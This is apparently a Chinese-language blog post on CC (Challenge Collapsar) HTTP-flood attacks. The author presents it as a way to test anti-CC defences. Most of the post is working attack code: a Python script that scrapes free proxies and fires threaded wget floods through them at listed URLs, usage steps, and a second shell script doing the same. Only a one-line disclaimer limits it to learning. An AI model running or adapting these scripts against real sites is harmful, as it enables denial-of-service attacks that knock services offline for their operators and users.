CC(ChallengeCollapsar)主要是用來攻擊頁面的。大家都有這樣的經歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,訪問的人越多,論壇的頁面越多,數據庫就越大,被訪問的頻率也越高,占用的系統資源也就相當可觀。
最近在做一些防CC的措施,想驗證效果就的有類似CC的攻擊,所以寫了個Python腳本來模擬CC攻擊,其原理很簡單,就是去網絡上拉取一下渣渣代理,然后通過代理去訪問服務器,成本低的嚇人,但影響卻不小…代碼如下(該腳本只能用於交流學習,一切因該腳本產生的不良后果,與我無關):
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
|
#!/usr/bin/python
#-------------------------------------------------------------------------------
# Name: CC.py
#
# Author: LiuSha
#
# Created: 1/07/2014
# Email: itchenyi@gmail.com
#-------------------------------------------------------------------------------
import urllib2
import re
import os
import threading
import time
import random
class RunCC(threading.Thread):
def __init__(self,proxy,url):
threading.Thread.__init__(self)
self.thread_proxy = proxy
self.thread_url = url
self.thread_stop = False
def run(self):
while not self.thread_stop:
os.system("""wget --ignore-length --cache=off --no-http-keep-alive -t 1 --referer="http://www.10086.com" -U 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' -e "http_proxy=http://%s/" "%s" &"""%(self.thread_proxy,self.thread_url))
def stop(self):
self.thread_stop = True
def get_stock_html(URL):
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
)
opener.addheaders = [
('User-agent',
'Mozilla/4.0 (compatible;MSIE 7.0;'
'Windows NT 5.1; .NET CLR 2.0.50727;'
'.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
]
url = "http://proxy.com.ru/%s"%URL
response = opener.open(url)
return ''.join(response.readlines())
def Getting_Url():
global CC_Url
file = open('url','r')
CC_Url = file.readlines()
file.close()
def Getting_list():
global IP_Port
IP_Port = []
for html_list in re.findall('list_\d+.html',get_stock_html("list_1.html")):
print "getting %s's IP:PORT"%html_list
IP_Port += eval(re.sub('',':',"%s"%re.findall('\d+.\d+.\d+.\d+\d+',get_stock_html(html_list))))
def main():
global CC_Dict
CC_Dict = {}
for i_name in range(len(IP_Port)):
CC_Dict['Thread%s'%i_name] = "RunCC('%s',r'''%s''')"%(IP_Port[i_name],random.choice(CC_Url))
for k,v in CC_Dict.items():
k = eval(v)
k.start()
time.sleep(0.6)
k.stop()
if __name__ == '__main__':
Getting_Url()
Getting_list()
main()
|
使用方法:
|
1
2
3
4
5
6
|
###url 文件一行一個url不嫌多###
[root@test-CC CC]# cat url
http://www.ipython.me/about-me
http://www.ipython.me/
###直接運行###
[root@test-CC CC]# python cc.py
|
勇敢的大飛哥也用shell 粗暴的寫了一個出來,代碼如下:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
#!/bin/sh
#Email:zhengxiaofeiccc@139.com
url=$1
page_number=`curl http://proxy.com.ru |grep -o "list_.*html"|awk -F "'" '{print $NF}'|tail -1|grep -o \[0-9\]*`
for i in `seq 1 $page_number`
do
curl http://proxy.com.ru/list_$i.html|egrep -o "[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*[0-9]{2,4}"|awk -F "<|>" '{print $1,$NF}' >> ip.txt
done
while read ip port
do
wget -b --cache=off --ignore-length --referer="http://www.10086.com" -U 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' \
-Y on -e "http_proxy=http://$ip:$port/" "$url"
done < ip.txt
|